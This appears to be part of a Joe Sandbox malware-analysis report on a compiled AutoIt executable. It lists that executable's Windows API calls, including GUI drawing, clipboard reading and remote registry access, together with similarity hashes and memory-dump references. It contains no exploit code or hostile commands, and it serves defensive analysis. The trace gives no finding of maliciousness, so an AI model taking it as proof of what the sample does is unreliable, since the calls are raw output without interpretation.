                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 69173610-0
                                                                                                        • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                        • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                        • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                        • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                        APIs
                                                                                                        • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                        • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                        • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                        • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                        • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                        • API String ID: 2910397461-517079104
                                                                                                        • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                        • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                        • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                        • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wcsnicmp
                                                                                                        • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                        • API String ID: 1038674560-3360698832
                                                                                                        • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                        • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                        • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                        • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                        APIs
                                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                        • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                        • SetCursor.USER32(00000000), ref: 00430773
                                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                        • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                        • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                        • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                        • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                        • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                        • SetCursor.USER32(00000000), ref: 00430803
                                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                        • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                        • SetCursor.USER32(00000000), ref: 00430833
                                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                        • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                        • SetCursor.USER32(00000000), ref: 00430863
                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                        • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                        • SetCursor.USER32(00000000), ref: 00430887
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                        • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cursor$Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 1675784387-0
                                                                                                        • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                        • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                        • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                        • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                        APIs
                                                                                                        • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                        • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                        • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                        • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                        • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                        • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                        • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                        • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                        • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                        • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                        • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                        • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                        • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                        • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                        • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                        • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                        • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                        • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                        • String ID:
                                                                                                        • API String ID: 1582027408-0
                                                                                                        • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                        • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                        • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                        • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                        APIs
                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseConnectCreateRegistry
                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                        • API String ID: 3217815495-966354055
                                                                                                        • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                        • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                        • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                        • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                        APIs
                                                                                                        • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                        • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                        • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                        • DestroyWindow.USER32(?), ref: 00456746
                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                        • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                        • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                        • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                        • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                        • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                        • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                        • String ID: ($,$tooltips_class32
                                                                                                        • API String ID: 225202481-3320066284
                                                                                                        • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                        • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                        • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                        • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                        APIs
                                                                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 15083398-0
                                                                                                        • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                        • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                        • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                        • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                        APIs
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                        • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                        • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                        • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                        • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                        • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                        • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                        • String ID: @$AutoIt v3 GUI
                                                                                                        • API String ID: 867697134-3359773793
                                                                                                        • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                        • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                        • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                        • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                        APIs
                                                                                                        Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1503153545-1459072770
Similarity
• API ID: __wcsicoll$__wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
• API String ID: 790654849-32604322
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
• _fseek.LIBCMT ref: 00452B3B
• __wsplitpath.LIBCMT ref: 00452B9B
• _wcscpy.LIBCMT ref: 00452BB0
• _wcscat.LIBCMT ref: 00452BC5
• __wsplitpath.LIBCMT ref: 00452BEF
• _wcscat.LIBCMT ref: 00452C07
• _wcscat.LIBCMT ref: 00452C1C
• __fread_nolock.LIBCMT ref: 00452C53
• __fread_nolock.LIBCMT ref: 00452C64
• __fread_nolock.LIBCMT ref: 00452C83
• __fread_nolock.LIBCMT ref: 00452C94
• __fread_nolock.LIBCMT ref: 00452CB5
• __fread_nolock.LIBCMT ref: 00452CC6
• __fread_nolock.LIBCMT ref: 00452CD7
• __fread_nolock.LIBCMT ref: 00452CE8
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
• __fread_nolock.LIBCMT ref: 00452D78
Similarity
• API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
• String ID:
• API String ID: 2054058615-0
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
Similarity
• API ID: Window
• String ID: 0
• API String ID: 2353593579-4108050209
APIs
• GetSysColor.USER32(0000000F), ref: 0044A05E
• GetClientRect.USER32(?,?), ref: 0044A0D1
• SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
• GetWindowDC.USER32(?), ref: 0044A0F6
• GetPixel.GDI32(00000000,?,?), ref: 0044A108
• ReleaseDC.USER32(?,?), ref: 0044A11B
• GetSysColor.USER32(0000000F), ref: 0044A131
• GetWindowLongW.USER32(?,000000F0), ref: 0044A140
• GetSysColor.USER32(0000000F), ref: 0044A14F
• GetSysColor.USER32(00000005), ref: 0044A15B
• GetWindowDC.USER32(?), ref: 0044A1BE
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
• GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
• GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
